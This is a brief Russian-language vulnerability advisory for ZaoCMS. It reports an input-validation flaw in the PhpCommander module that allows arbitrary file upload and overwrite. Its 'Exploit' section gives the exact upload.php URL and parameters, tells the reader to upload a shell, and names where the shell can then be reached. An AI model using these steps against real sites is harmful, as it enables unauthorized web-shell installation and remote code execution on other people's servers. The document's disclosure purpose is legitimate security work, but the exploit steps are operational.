Программа: ZaoCMS
Найденная уязвимость позволяет перезаписать произвольные файлы на целевой
системе. Уязвимость существует из-за ошибки в проверке входных данных в
функциональности PhpCommander. Атакующий может загрузить произвольные файлы на
целевую систему.
Эксплоит:
Проследуйте по ссылке
http://localhost/admin/functions/PhpCommander/upload.php?Directory=./&sort=NomASC&action=upload
Загрузите шелл.
Местоположение:
http://localhost/documents/SHELL.PHP
